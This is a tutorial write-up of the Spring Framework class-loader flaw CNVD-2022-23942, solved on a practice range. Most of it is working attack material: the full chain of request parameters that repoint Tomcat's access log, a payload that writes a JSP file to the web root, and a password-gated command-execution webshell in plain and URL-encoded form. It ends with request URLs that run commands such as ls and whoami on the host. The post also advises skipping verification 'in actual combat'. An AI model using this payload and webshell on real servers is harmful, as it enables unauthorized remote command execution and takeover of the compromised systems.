CNVD-2022-23942
1. Scope of influence:
1. jdk9+
2. Spring Framework 5.3.X < 5.3.18
Spring Framework 5.2.X < 5.2.20
2. Principle: use the class object to construct the exploit chain, modify the log configuration of Tomcat, and then write the shell to the log; the complete exploit chain :
class.module.classLoader.resources.context.parent.pipeline.first.pattern=
构建文件的内容
class.module.classLoader.resources.context.parent.pipeline.first.suffix=
修改tomcat日志文件后缀
class.module.classLoader.resources.context.parent.pipeline.first.directory=
写入文件所在的网站根目录
class.module.classLoader.resources.context.parent.pipeline.first.prefix=
写入文件名称
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
文件日期格式(实际构造为空值即可)
3. Recurrence process
open range
Visit the range and grab the bag
Construct payload //This payload adds a line break for easy understanding, and the space after "&" needs to be deleted during use
?class.module.classLoader.resources.context.parent.pipeline.first.pattern=spring&
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&
class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&
class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
Send payload:
GET method (can be divided into five requests, or a single request), if ok appears, it means the execution is successful
After sending the payload, visit http://123.58.224.8:15494/shell.jsp , and a spring appears on the interface indicating that the writing is successful;
The next thing to do is to change the content to webshell and let it parse it.
Write the webshell to the root directory of the website
webshell code :
url编码前的webshell:
%{c}i if("d".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{e}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{f}i
url编码后的webshell:
%25%7Bc%7Di%20if(%22d%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Be%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bf%7Di
f:%>//
e:Runtime
c:<%
The webshell here is also written by someone else based on the gourd painting, but the master explained the analysis of the webshell at about the 17th minute of the video https://www.bilibili.com/video/BV19u411y7iA , the passing master has more Those who understand the principle can leave a message in the comment area~, let's learn together~
Returning ok indicates that the webshell has been written to the server,
Access and get the flag
http://123.58.224.8:15494/shell.jsp?pwd=d&cmd=ls%20/tmp
In addition, you can also try to execute other arbitrary commands, such as whoami
pingDNS
In actual combat, the verification step can be omitted, and the webshell can be written directly
Summary: Through this vulnerability, webshell can be written to cause command execution.
If it can help you, please give me a thumbs up!
Disclaimer: This article is for learning purposes only, and shall not be used for unauthorized penetration testing, and illegal use is prohibited.